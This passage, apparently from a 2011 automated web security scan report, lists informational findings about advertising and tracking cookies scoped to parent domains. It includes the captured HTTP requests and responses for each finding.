TFF=eJyVljGSwyAMRe%252FiEyCBI4MbH2NbFyl2ZrvdLpO7L3ZixSCUiCJjx%252FOf%252BR8JzJoukG6%252FCTAN6MLiRlhijDjMa8J0%252B04w599ILl%252FccXsX%252BnHT%252B0qP8%252BPvmSPGbER%252B5kKpjPBUjvLd16%252Frz%252Fp3HRQCfSMGbH4urhU7nsxAQ1%252BH4IF8xRFjNiJf1dhB8YTQzEBahqdeFOIYp%252BaIMSuxNwlMi3PYcjYh6%252FPtpg8vPcToCauRdqKcLUlGB5PwqJOlx7qRrdzFyhFjNiI%252Fg6nH09ZmrrmI5XyXejX7B07NXnPEWPdI0JkI3icCxRmozmpiHwmjOten2nju0EOP5MjXI3lZVUG2V4VKlh7FbBg5UV8jR1aOGLMR%252BRnGDk8A4%252BJ8c3ds1unQk58mUFPAG%252FJ9nQRZelTr9IFT61RzxJiNyFcYOzxh2HZh%252B3wf%252Br7uJgbNXROwp2vIq1%252BuD3pjHz8q8cCsGbK8KwNpO1R8Hemi4%252F499EiI4qwij2gKKc5FFrJZfRMZMin2Dp0s56VebVauXm0qR4zZiK3G1OFp%252F3BRu8YnPTT0Irs8yUU4fx9JPfGWxP0fwDsYOA%253D%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxlj8tqwzAURP9Fe4HuQ1fSzcqvgiE1IWmguxA5CjUUvDDppvTfmxi6SXfDcA7MnFX0e1FSc%252Bxbs7knVAPBc87inSCNPhem63h22YeRErhLenAAam7T5XRAx%252F3QrKqoGamgFy42xJwtX4u32YHYVHKJJToWR8961b4%252FKgxqmqo7dMNHWD5v%252FUTb2b%252Ft59M8L%252FXX6z9rN6xVUoMBmaI4SIghsiDEZ3p3rP8mYuqY2vhiPTbechNqW2NXWQcROEknEmBl1Wz392OTgk%252FkfKDNzy%252Bp305G; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJztlsty2zAMRf%252FFX8CHZIryxok803omUj2J6klXnSyzzrLtv5ciKRoEAfmRLrrwFgcX4AOU7lvbrNtfH62s29WLEtV%252B6H4LubXW1qvNuwsbsXFUt6v%252B2zB%252Bffrx87h%252F2Y%252BrzVsr5SVKASkEKgGsMYmgQqMUVT9lqwikA3WMg1CWqwkwMEUGLjcrEjf8sHuNG14H2iiw4UAhUAlgjUkEFXruX7fSdTcKAO3jRKYVspECgYfHsQTax2FmusRjfonZngIl9uQA1qRLPMJ8AwopesEnDkEFGhUqA2ZssWrHVe0IFbxmxR1JoPw118Q6vUbz6wycWKevya7zMCyNo6fUOg8DN46HgWvDH4enfBvyOCbN0nF4Th3HVLNQ%252BYa1jGdhItLzvjwBQRuCOLcKYRDx38D9F19XGWE0YOsZwXzhg2VyqIMy%252FTPFmelhFwBNUsHhwLDieO6seDpeTjy%252FYE7sHyov7s6IuxJOFyVlTV2UCxOnZnTTSIOvulLkVVcqTxyl0eAnMSdOYdhKzplwDDNSrALctlJRYgUGEoE4BqUiAUpRuX%252BHyEAxOKhiPjgIEmK5JCY7p6ljOoepYzoDMdl5FlOdTyNLd44jS3eGYqpzEmcwfjMP3x%252Fzv6qdDcaJQqASwBqTCMw3oFD%252B%252FysbKQgq0KhQoargPZZiDN0L6vvdVmkj5uXPn75%252BBwI2zCnOs9NLeKbkLozzRkrePfWU3IVBwBlYONA4f%252Friz%252FNcsHU2kazUDSQnjSPFSaeJ4qXdsrRjpfE6Oel0mzn7s%252BjVKVtuOQ9uFz34rYab99WUhc4%252FnBc75jMGmffBZy3vjc7WFj%252FMAi4b2E%252F41E%252FYUd51njGYN%252FnI7JCwXQyQt4uMM1zygazn%252B6cWL98Vsnj2v7V45cRiyFi8aw0dY9%252FuZu1u1m43a7wnW7JfcOQLl6UJMfdeCpeleZd1nam6zkPdLdMllukvgt0M9Q%253D%253D; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlkFywyAMRe%252FSEyCBI%252BRsfIxus8iiM921u0zuXuzY2CDkiC4ydpj%252FzBcSgtt4iePjZwQcP9CFyQ0wMTN%252BXG8jjo%252BvEa7pN5BLD7e9PoV%252BmPW%252B0uP19ffIUcZsRBpzoVQyrMpBfvv%252Bef%252B%252B%252Fd6rb7NfCQyNMGD2c3GtsPlgBhr6OohszVccZcxGpKcadlA8ITRjIC2GVS8Ssc1Tc5QxK7EUCcTJOWw5i5j16XXWh10PzJ6wmmkhytWSJDuIwqNOlh7rQrZyFytHGbMRaQxij6e5zFxzE8v1LvVq7G84Nfaao4x1zwSdEcF5RKA4A9VZTSwzIatrfciNzxW66ZEc%252BXqmrUmdke1doZKlR7EaRk7k18iRlaOM2Yg0htzhCWCYnG92x2aeNj35GEGNAk7I8zwJsvSo5ukNp%252Bap5ihjNiI9YejwhGHuwvb13vR91U0ZNFdNwJ6qIa%252BeXG%252F0xjp%252BZeKFWWNI8q4YSOtQvF%252Fp2OX63fRIiOKuIq9oCinuRRaymX0TGRIpeodOlutS7zYrV%252B82laOM2Yg5x9ThaTm4qJ3jgx4aehG7vMkxHM9HUm%252B8zZl8VKtvr1be%252B8Cqb1eC7DjsGzOFf3J1n9c5v3PoyYlF1EDKnI1IYz6alM8%252F0Jl0IA%253D%253D; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:33:26 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:33:26 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNkEkSgzAMBP%252FCCzSSjWzzGBVHzjmm%252BHssQxbCktxc1TOWWmMBlftUcs5xGEvyNw23glQ6RCVTYwpGEcaGbpgKXjSxUyQjYiMTp%252FxFvUuolJ3KAYXT9nN4U3HKuXWx%252FBy3FIhGUptLt3%252FR7DtDde02qm%252BK51xdjeYqT0igqo%252Bt%252Fl5wbpfqazT%252Biu4vtb0FX9rKpW24sPUVWUnlwGc3aPHRGuVf0U%252Bf3KikRsM6VSUl6MnUjcCyIvPByc98mPFnOOQs9G%252BYRSkeZPd%252B8wM4%252B8q6; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Date: Thu, 12 May 2011 13:33:27 GMT
Server: HTTP server
Content-Length: 891

document.write('<img src="http://ad.yieldmanager.com/pixel?id=23705&data=238001&id=717024&data=238001&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.ex
...[SNIP]...
8.49. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d65B01EE3EC5F47D58DBC84E1BCDF22CC%7cEANON%3dA%253D0052022ZRGXhXkgAjidkROMuEu30ABHwUxMAZyNwuiYEkwaq1z_Xe35lvdxCzczCJ-1dzLNQb-nBV2PDkwxZ1a7Ba1KNl%2526E%253Dad6%2526W%253D1%7cNAP%3dV%253D1.9%2526E%253Da7c%2526C%253D47neDAnwe3Yg90a_YrfMiF06g8H4_-8ZCZDCdywsuAuISk_7y4iTqg%2526W%253D1 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/networks-exchanges/overview
Cookie: uuid2=2724386019227846218; icu=ChEI9nIQChgCIAIoAjC12KnuBBC12KnuBBgB; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#!z6Uxbd$ekQ..D!3bbvAPDd9f*e9c*LWg-SshA`8$?a)T!ZzNA9M_bIE:45yss4BdAEHBR`w8gjKhqq[rw>I9kV4Gi(D(zp+<^Z#LH)ILDl*S9%l$yrDv:=@nUd1.!jfu=ebuoIjRGQr(L.@`!!V0y_nG*.; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:34:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:34:36 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:34:36 GMT

GIF89a.............!.......,........@..L..;
8.50. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt119ilbxzt1tr37xzt1tr37xzt119ilbxzt117rw8; adh="1lkkxr8160b52rf021r8019eRhRKjR600ghd81et018qzlZAsw500gg2f54hb011r8019CeuhHB3X00ggny4ka20103r018twhJPTGt00gg5452rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh19ilb01r3o010k0u51d; rdrlst=4330pahlkze3o0000000l3o01157olkxlm50000000t3o01144qlkze3o0000000l3o0113y7lkze3o0000000l3o010hsnlkze3o0000000l3o0115sklkkpqq000000163o0112nslkxrxz0000000n3o0112gdlkkyy0000000123o010morlkkxrb000000133o0114k6lkxlm50000000t3o010w35lkze3o0000000l3o0113pylkze3o0000000l3o0114rwlkxlm50000000t3o011628lkze3y0000000j3o01132dlkzsmp0000000c3o0114khlkxlm50000000t3o011196lkkkbe0000001c3o0113x4lkxrxz0000000n3o01106sll3470000000013o0113qmlkze3y0000000j3o011195lkkpqh000000173o011194lkkjj40000001d3o0116nulkxlm50000000t3o0113q8lkze3y0000000j3o011193lkkplo000000193o011192lkkpke0000001b3o010p46lkkpqq000000163o010zg4lkze3y0000000j3o01144elkze3o0000000l3o0113qwlkze4r0000000i3o0110poljyxb40000001o3o01106llkzt2k0000000b3o010e6llkl0r50000000z3o0116dnlkze3o0000000l3o01138olkxrxz0000000n3o0116y4ll1dpj000000063o01167ulkxq410000000o3o01159olk8fax0000001j3o0114qllkxlm50000000t3o0115halkxlm50000000t3o010m0plkkxrb000000133o0116e6lkxnbq0000000s3o0113zblkze3y0000000j3o0114xnlkxlm50000000t3o0116dxlkze3o0000000l3o011391lkxrxz0000000n3o0115zhlkze3y0000000j3o011672lkkxrb000000133o010ycrlkncow0000000x3o010okclkze3o0000000l3o01158mlkze3o0000000l3o011015lkze3y0000000j3o0113lelkxrxz0000000n3o0113yolkze3o0000000l3o010ojulkze3o0000000l3o011240lkxrxz0000000n3o0114ozlkxlm50000000t3o0114bmlkxrxz0000000n3o011590lkzsm20000000d3o0114j7lkxlm50000000t3o0114bzlkxlm50000000t3o0111pjlkxrxz0000000n3o010p01lkze3o0000000l3o0115holkxlm50000000t3o010m7alkkxrb000000133o0113mklkxrxz0000000n3o01101ulkze3o0000000l3o0112zglkxrxz0000000n3o0113lxlkxrxz0000000n3o010zp4lkze3o0000000l3o01148ilkxlm50000000t3o010xvclkze3o0000000l3o0116sjll1dpj000000063o0112yxlkxrxz0000000n3o0115iglkxq0l0000000p3o0113n7lkze3y0000000j3o0116s2lkxpyu0000000q3o0114hplkxlm50000000t3o010znmlk34620000001m3o0114hclkxlm50000000t3o010wd7lkze3o0000000l3o01102plkxrxz0000000n3o0110tylkkpku0000001a3o010p1alkze3o0000000l3o0100bvlk9pe80000001i3o0115xylk60qe0000001l3o0110lxlkxrxz0000000n3o01103blkxrxz0000000n3o0110telkd7nq0000001g3o0116rslkxppm0000000r3o010c9slk9pe80000001i3o0113mxlkze3o0000000l3o0112emlkze3o0000000l3o0110rdlkdkly0000001e3o010z9zlkze3y0000000j3o01163plkxlm50000000t3o010z9xlkze3o0000000l3o010m40lkkxrb000000133o010zqylkxrxz0000000n3o010mjelkkxrb000000133o0112qnlkkplt000000183o0114e9lkze3o0000000l3o0112x6lkxrxz0000000n3o011342lkze3y0000000j3o0116aulkze3o0000000l3o0116atlkxlm50000000t3o011203lkb5u20000001h3o01163clkxlm50000000t3o010afqlkze3o0000000l3o010o0vlkkpqx000000153o010z2ilkkxrb000000133o01; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm505ikv00t3o010k0t50tarllkxlm505ikv00t3o010k0t50tcg5lkxlm505ikv00s3n000k005009rslkkpke0iemm01b3o010k0u51bam5lkkxr8002zw0143o010k0u514cd4lkxlm5026sw00f3m000k00500crglkxlm505ikv00t3o010k0t50tcnolkxlm505ikv00s3n000k00500abelkxlm505ikv00s3n000k00500dd8lkxlm5026sw00f3m000k00500cy2lkxlm505ikv00s3n000k00500aoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00t3o010k0t50te3qll1dpj01qhh0063o010k06506bq3lkxlm505ikv00s3n000k00500aoilkxlm503s3e00n3n000k00500bvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k005008ndlkb5u20mfs300o3l000k00500bvclkxlm505ikv00s3n000k00500c5flkxlm505ikv00s3n000k0050056blkb5u20mfs300o3l000k00500bjqlkxlm505ikv00s3n000k00500awklkxlm505ikv00s3n000k00500asulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm505ikv00s3n000k00500c5rlkov6e0000000w3o010k0u50waw8lkxlm505ikv00t3o010k0t50tc60lkxlm505ikv00s3n000k00500dc4lkxlm505ikv00s3n000k00500d26lkxlm505ikv00s3n000k00500dnjlkxlm505ikv00t3o010k0t50tcbclkxlm505ikv00s3n000k00500c85lkxlm505ikv00s3n000k00500csslkxlm505ikv00t3o010k0t50tc80lkb5u209jqc0063e000j00500ag2lkd7nq0pwja01g3o010k0u51dc1elkxlm505ikv00s3n000k00500c81lkkpke0cw1r00i3l000k005009grlkxlm505ikv00s3n000k00500c8flkxlm505ikv00s3n000k00500a6slkkpke0cw1r00i3l000k00500dnalkxlm505ikv00s3n000k005009z6lkxlm505ikv00s3n000k00500dbtlkxlm505ikv00s3n000k005000kllklhm40c4010053l000k00500dyllkxlm505ikv00s3n000k005009q4lkxlm505ikv00s3n000k00500b3zlkxlm503s3e00n3n000k005009q5lkb5u20mfs300o3l000k005009mjlkxlm5026sw00f3m000k00500dgflkkpke0iemm01a3n000k005000t7ljyxb4146vw01o3o010k0u51dbo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm505ikv00s3n000k00500d86lklhm40c4010053l000k00500cwalkxlm505ikv00s3n000k00500dqllkxlm505ikv00s3n000k00500d84lkxlm505ikv00s3n000k00500dz3lkxlm5026sw00f3m000k00500cm6lkxlm505ikv00s3n000k00500cxdlkxlm505ikv00t3o010k0t50t719lkb5u20rycy00y3n000k0050071alkkpke0cw1r00i3l000k00500ctplkxlm505ikv00s3n000k00500cc3lkxlm505ikv00s3n000k00500dgilkb5u209jqc0063e000j00500cthlkxlm505ikv00s3n000k005004wclkb5u20q7vh00t3n000k00500a0ulkxlm503s3e00n3n000k005005mrlkb5u20mfs300o3l000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000063o010k06506cbplkxlm505ikv00s3n000k00500bwjlkkyy00i5900123o010k0u5129gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1x4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a24t5cm127p10n23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt119inbxzt1tr37xzt1tr37xzt119inbxzt117rw8; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: adh="1lkkxr8160b52rf021r8019eRhRKjR600ghd81et018qzlZAsw500gg2f54hb011r8019CeuhHB3X00ggny4ka20103r018twhJPTGt00gg5452rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh19inb01s3o020k0v51e; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4340pahlkze3o0000000m3o02144qlkze3o0000000m3o02157olkxlm50000000u3o0213y7lkze3o0000000m3o0215sklkkpqq000000173o020hsnlkze3o0000000m3o0212nslkxrxz0000000o3o0212gdlkkyy0000000133o020morlkkxrb000000143o0214k6lkxlm50000000u3o020w35lkze3o0000000m3o0213pylkze3o0000000m3o0214rwlkxlm50000000u3o021628lkze3y0000000k3o02132dlkzsmp0000000d3o0214khlkxlm50000000u3o021196lkkkbe0000001d3o0213x4lkxrxz0000000o3o02106sll3470000000023o0213qmlkze3y0000000k3o021195lkkpqh000000183o021194lkkjj40000001e3o0216nulkxlm50000000u3o0213q8lkze3y0000000k3o021193lkkplo0000001a3o020p46lkkpqq000000173o021192lkkpke0000001c3o020zg4lkze3y0000000k3o0213qwlkze4r0000000j3o02144elkze3o0000000m3o0210poljyxb40000001p3o020e6llkl0r5000000103o02106llkzt2k0000000c3o02138olkxrxz0000000o3o0216dnlkze3o0000000m3o0216y4ll1dpj000000073o02167ulkxq410000000p3o0214qllkxlm50000000u3o02159olk8fax0000001k3o0215halkxlm50000000u3o020m0plkkxrb000000143o0216e6lkxnbq0000000t3o0213zblkze3y0000000k3o0214xnlkxlm50000000u3o0216dxlkze3o0000000m3o021391lkxrxz0000000o3o021672lkkxrb000000143o0215zhlkze3y0000000k3o020ycrlkncow0000000y3o020okclkze3o0000000m3o02158mlkze3o0000000m3o021015lkze3y0000000k3o0213lelkxrxz0000000o3o0213yolkze3o0000000m3o020ojulkze3o0000000m3o021240lkxrxz0000000o3o0214ozlkxlm50000000u3o0214bmlkxrxz0000000o3o021590lkzsm20000000e3o0214j7lkxlm50000000u3o0214bzlkxlm50000000u3o0211pjlkxrxz0000000o3o020p01lkze3o0000000m3o0215holkxlm50000000u3o020m7alkkxrb000000143o0213mklkxrxz0000000o3o02101ulkze3o0000000m3o0212zglkxrxz0000000o3o0213lxlkxrxz0000000o3o020zp4lkze3o0000000m3o02148ilkxlm50000000u3o020xvclkze3o0000000m3o0216sjll1dpj000000073o0212yxlkxrxz0000000o3o0215iglkxq0l0000000q3o0213n7lkze3y0000000k3o0216s2lkxpyu0000000r3o0214hplkxlm50000000u3o020znmlk34620000001n3o0214hclkxlm50000000u3o020wd7lkze3o0000000m3o02102plkxrxz0000000o3o0210tylkkpku0000001b3o020p1alkze3o0000000m3o0211z1ll3490000000013o0100bvlk9pe80000001j3o0215xylk60qe0000001m3o0210lxlkxrxz0000000o3o02103blkxrxz0000000o3o0210telkd7nq0000001h3o0216rslkxppm0000000s3o020c9slk9pe80000001j3o0213mxlkze3o0000000m3o0212emlkze3o0000000m3o0210rdlkdkly0000001f3o020z9zlkze3y0000000k3o02163plkxlm50000000u3o020z9xlkze3o0000000m3o020m40lkkxrb000000143o020zqylkxrxz0000000o3o020mjelkkxrb000000143o0212qnlkkplt000000193o0212x6lkxrxz0000000o3o0214e9lkze3o0000000m3o021342lkze3y0000000k3o0216aulkze3o0000000m3o0216atlkxlm50000000u3o021203lkb5u20000001i3o02163clkxlm50000000u3o020afqlkze3o0000000m3o020o0vlkkpqx000000163o020z2ilkkxrb000000143o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm505imv00u3o020k0u50uarllkxlm505imv00u3o020k0u50ucg5lkxlm505ikv00s3n000k005009rslkkpke0ieom01c3o020k0v51cam5lkkxr8002zw0153o020k0v515cd4lkxlm5026sw00f3m000k00500crglkxlm505imv00u3o020k0u50ucnolkxlm505ikv00s3n000k00500abelkxlm505ikv00s3n000k00500dd8lkxlm5026sw00f3m000k00500cy2lkxlm505ikv00s3n000k00500aoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00u3o020k0u50ue3qll1dpj01qjh0073o020k07507bq3lkxlm505ikv00s3n000k00500bvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm505imv00o3o010k02502bvclkxlm505ikv00s3n000k00500c5flkxlm505ikv00s3n000k0050056blkb5u20mfs300o3l000k00500bjqlkxlm505ikv00s3n000k00500awklkxlm505ikv00s3n000k00500asulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm505ikv00s3n000k00500c5rlkov6e0000000x3o020k0v50xaw8lkxlm505imv00u3o020k0u50uc60lkxlm505ikv00s3n000k00500dc4lkxlm505ikv00s3n000k00500d26lkxlm505ikv00s3n000k00500dnjlkxlm505imv00u3o020k0u50ucbclkxlm505ikv00s3n000k00500c85lkxlm505ikv00s3n000k00500csslkxlm505imv00u3o020k0u50uc80lkb5u209jqc0063e000j00500ag2lkd7nq0pwla01h3o020k0v51ec1elkxlm505ikv00s3n000k00500c81lkkpke0cw1r00i3l000k005009grlkxlm505ikv00s3n000k00500c8flkxlm505ikv00s3n000k00500a6slkkpke0cw1r00i3l000k00500dnalkxlm505ikv00s3n000k005009z6lkxlm505ikv00s3n000k00500dbtlkxlm505ikv00s3n000k005009q4lkxlm505ikv00s3n000k00500dyllkxlm505ikv00s3n000k005000kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb4146xw01p3o020k0v51edgflkkpke0iemm01a3n000k005009mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm505ikv00s3n000k00500cwalkxlm505ikv00s3n000k00500d86lklhm40c4010053l000k00500d84lkxlm505ikv00s3n000k00500dqllkxlm505ikv00s3n000k00500dz3lkxlm5026sw00f3m000k00500cm6lkxlm505ikv00s3n000k00500cxdlkxlm505imv00u3o020k0u50u719lkb5u20rycy00y3n000k0050071alkkpke0cw1r00i3l000k00500ctplkxlm505ikv00s3n000k00500cc3lkxlm505ikv00s3n000k00500dgilkb5u209jqc0063e000j00500cthlkxlm505ikv00s3n000k005004wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000073o020k07507bwjlkkyy00i5b00133o020k0v513cbplkxlm505ikv00s3n000k005009gelkxlm503s3e00n3n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1y4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724f204103210524na8i103210e24eyja103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24ldza127p10n24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24t5cm127p10n24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Location: http://bstats.adbrite.com/click/bstats.gif?kid=47763545&bapid=10883&uid=712155
Content-Length: 0
Date: Thu, 12 May 2011 13:31:47 GMT

8.51. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.05833011493086815&sig=ITsRLEGg HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 13:32:37 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305207157807; Domain=.outbrain.com; Path=/
